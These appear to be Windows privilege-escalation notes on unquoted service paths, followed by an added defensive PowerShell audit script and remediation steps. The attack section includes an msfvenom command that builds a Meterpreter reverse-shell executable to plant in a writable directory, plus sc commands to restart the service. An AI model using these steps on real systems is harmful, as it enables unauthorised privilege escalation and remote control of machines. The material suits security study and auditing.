- Check for any service with an unquoted path that contains spaces, like `C:\Program Files\My Program\My Service\svice.exe`. If the service path is stored unquoted, whenever Windows starts the service it will attempt to run an executable from the following paths, in this order:
  - `C:\Program.exe`
  - `C:\Program Files\My.exe`
  - `C:\Program Files\My Program\My.exe`
  - `C:\Program Files\My Program\My Service\svice.exe`
- If we have write permission on `My Program`, we can put `My.exe` there, e.g. an add-user executable like in Binary hijacking / Insecure File permissions.
- Or we can create a reverse shell:
  `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f exe > My.exe`
- Stop the service (`sc` takes the service name as listed by `sc query`, not the executable name):
  `sc stop <ServiceName>`
- Transfer `My.exe` into `My Program`
- Start the service:
  `sc start <ServiceName>`
- Windows now launches `My.exe` instead of `svice.exe`, so the exploit is successful.
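The audit below is an added example, not part of the original notes: it lists services whose image path is unquoted and contains a space, computes the candidate executables Windows would try before the real one (the split rule shown above), and reports whether a low-privilege principal could write to each candidate's directory. The `$lowPriv` identity list is an assumption; extend it for your environment.

```powershell
# Added audit script (not from the original notes). Reports unquoted service
# paths and which of the resulting candidate directories low-privilege users can write to.
$lowPriv = @('BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

function Get-SearchCandidates([string]$cmdline) {
    # Keep only the executable part (heuristic: cut after the first ".exe"), then
    # build the prefixes Windows tries: everything before each space + ".exe".
    $exe = ($cmdline -replace '(?i)(\.exe).*$', '$1')
    $parts = $exe -split ' '
    $cands = @()
    for ($i = 0; $i -lt $parts.Count - 1; $i++) {
        $cands += (($parts[0..$i] -join ' ') + '.exe')
    }
    return $cands
}

function Test-LowPrivWritable([string]$dir) {
    # True if any Allow ACE for a low-privilege identity grants write/modify rights.
    if (-not (Test-Path -LiteralPath $dir)) { return $false }
    $acl = Get-Acl -LiteralPath $dir
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($lowPriv -notcontains $ace.IdentityReference.Value) { continue }
        if ($ace.FileSystemRights -match 'Write|CreateFiles|Modify|FullControl') { return $true }
    }
    return $false
}

Get-CimInstance Win32_Service | ForEach-Object {
    $path = $_.PathName
    if (-not $path -or $path.StartsWith('"')) { return }   # quoted path: not affected
    if ($path -notmatch ' ') { return }                      # no space: nothing to split on
    foreach ($c in (Get-SearchCandidates $path)) {
        [PSCustomObject]@{
            Service         = $_.Name
            ImagePath       = $path
            Candidate       = $c
            LowPrivWritable = Test-LowPrivWritable (Split-Path -Parent $c)
        }
    }
}
```

Any row with `LowPrivWritable = True` is the finding to fix; the remediation is to quote the image path (from an elevated cmd: `sc.exe config <ServiceName> binPath= "\"C:\Program Files\My Program\My Service\svice.exe\""`) and remove write access for non-admin principals on the intermediate directories.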